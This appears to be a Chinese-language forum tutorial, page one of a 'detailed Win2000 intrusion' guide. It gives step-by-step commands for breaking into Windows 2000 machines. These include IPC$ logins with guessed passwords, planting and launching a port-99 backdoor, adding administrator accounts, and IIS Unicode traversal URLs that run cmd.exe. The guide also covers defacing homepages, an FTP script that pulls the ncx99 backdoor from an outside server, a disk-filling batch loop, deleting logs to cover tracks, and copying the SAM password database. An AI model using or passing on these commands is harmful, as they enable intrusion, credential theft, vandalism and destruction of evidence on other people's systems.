Win2000的漏洞我知道的也就这几个在这献丑了
先什么呢?????就ipc$吧毕竟这个好理解 什么是ipc$ 我就不说了,我也不大明白
ipc探测大多基于139 用的工具当然是流光了呵呵其实还有别的工具也可以探测,我个人认为还是流光好.怎么用流光的ipc探测帮助里写的相当相当详细了
流光的帮助是我见过黑客教学最傻瓜的了大家 知道探测出密码了,可以用种植者
种植但是有时启动不起来那还要我们来帮助它吧 呵呵
net use \\**.**.***.***\ipc$ "quot;密码"quot; /user:"quot;这个你自己猜吧"quot;
*** 是目标的位置就是ip 好象这是废话 呵呵
copy \tools\srv.exe \\202.**.**.**\admin$\system32 这个就是把srv.exe 复制到 肉鸡上
net time \\203.161"gt;**.** 这个就是查看肉鸡的时间
比如说是 02:22 这个有可能是 02:22 还有可能是 14:22
at \\203.**.**.** TIME srv.exe 这样就启动了 srv.exe了
然后就telnet 203.**.**.** 99 (srn.exe 其实就是在99端口开启个后门 呵呵)
上去了吧 哈哈 对了上去也不代表我就控制了机器呀 对呀 你还要成为管理员 这样就方便多了呵呵
命令是 net user 用户 /add 这个是创建个用户
net localgroup administrators 用户 /add 这呀就是把刚才你加的用户加到管理员权限里
好了现在你是管理员了 呵呵 2000的一个很有用的就是做跳板
netsvc \\127.0.0.1 telnet /stop
netsvc \\127.0.0.1 telnet /start
这两个命令最好还是在肉鸡上执行
好象快点
好了ipc就介绍到这吧 其实net命令很有用的强烈推荐大家 好好看看命令详解
下面呢????好就cgi吧 哈哈这个好象难了点 我看见不少人都问怎么用好我就给大家介绍介绍 我其实也不怎么熟的 呵呵这是 我转来得大家 好好看看 我也懒
一、Unicode漏洞的实现
要利用unicode利用,先要知道如何实现,通常,我们通过以下几种途径来利用Unicode漏洞:
--http://www.exsample.com/scripts/..蜡..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/msadc/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/_vti_bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/_mem_bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/cgi-bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
如果浏览器返回C:的目录列表,那么就可以继续了。其中,从dir开始是真正的命令,用 连接命令。(注:下面将不再把前面的地址写上,直接为命令)
二、如何修改对方主页?
通常,在系统盘的目录下有Inetpub目录.其中有个wwwroot目录是用来存放主页空间的。
先dir C:\Inetpub\wwwroot\察看目录:
返回:
======================================================
Directory of C:\inetpub\wwwroot
=========================================================
接着:我们就
del c:\inetpub\wwwroot\default.asp
echo Hacked By Hacker "gt; c:\inetpub\wwwroot\default.asp
利用echo命令和重定向符号创建新文件.
三、如果主页不在默认路径下,如何知道在哪里?
我们可以到他的主页上,选取他的标题图片,右键点击,看它的文件名。比如:exsample.gif
于是,我们用:
dir c:\exsample.gif/s
dir d:\exsmaple.gif/s
...
这样可以搜索到它的标题图片,通常在主页的images目录下,那么这个目录的上级目录就是存放主页的。
按照二中所讲的方法可以修改其主页。
四、如何将文件上传?
这个是我们最关心的了,因为一旦上传了如ncx99一样的程序,那么有些事就好办多了。偷懒的人也许上传个冰河上去:)。
方法:(俗称ftp方法)
echo open ftp.xxx.com(ftp主机) "gt; c:\temp.1 (可以随便取个名字,最好放到隐蔽的地方)
echo user yourname "gt;"gt; c:\temp.1 yourname是你的用户名
echo yourpasswd "gt;"gt; c:\temp.1 yourpasswd是你的密码
echo get ncx99.exe "gt;"gt; c:\temp.1 你要下载的文件
echo quit "gt;"gt; c:\temp.1
ftp /s:c:\temp.1
好了,过一会儿,用dir察看当前目录,就会看见ncx99.exe,酷!接下来如何,不用说了吧!
五、如何做个很大的文件?
我们可以用bat文件来实现。用echo建立如下文件,注意扩展名为bat:
@echo off
echo big "gt; x.x
:w
copy x.x x.x x.x
goto w
这样,就会……呵呵,不用说了吧,但这个好像不好。也可以上传个程序过去。这个只不过比较方便。
六、万一遇到长文件名怎么办?
这是很菜鸟的问题,但确实有人不会用,我在这里简单地说一下:
例如:
c:\program files\microsoft billgates\hackermanandwoman.txt
如何表示?用:
c:\"quot;program20%files"quot;\"quot;microsoft20%billgates"quot;\hackermanandwoman.txt
七、如何删除脚印(日志)?
用如下命令:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
八、如何创建新的用户名,并将用户名加入Administrator组?
这个不一定会成功,由于你没有足够的权限。除非碰到一些傻瓜网站。
我们可以用echo创建一个bat文件。包含一下命令:
net user Myname MyPasswd /add /expires:never
net localgroup "quot;administrators"quot; /add Myname
然后,执行这个bat,就可以了。记得把它删除哦!
九、如何获得SAM数据库?
先用上传文件的方法上传samdump,然后用它把sam库拷贝到别的地方(直接下载SAM库是不行的)。
比如samdump C:\winnt\system32\config\sam C:\temp.aaa
然后在把temp.aaa上传到你的ftp服务器上,也可以把它拷贝到主页目录下,用浏览器下载。
呵呵 上面说的 其实很简单的
http://*****.***"gt;***/msadc/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
这个就是最经典的unicode漏洞了 最主要是能用命令呵呵 /winnt/system32/cmd.exe?/c 这个后面就是用命令的地方 比如要看system32 文件夹的内容 就是 /winnt/system32/cmd.exe?/c dir c:\winnt\system32
还有别的命令 呵呵 ../winnt/system32/cmd.exe?/c copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\
这个就是把 sam复制到wwwoot 呵呵到了那你知道要干什么了吧 当然了下载后破解密码呀 哈哈 对了破解密码的时间可不短呀 呵呵 不管是什么漏洞都是为了得到管理员权限 我们既然把srv.exe复制到肉鸡上了当然是启动他了 用 ftp你可以自己社定地址 比如你把srv.exe复制到C:\Inetpub\scripts\里了 启动它就是 winnt/system32/cmd.exe?/c C:\Inetpub\scripts\srv.exe
既然启动你还塄着干什么 telnet 呀 呵呵 还是 99 端口呀
[1] [2] [3] [4] 下一页
[推荐]Win2000入侵超详细教程
您现在的位置: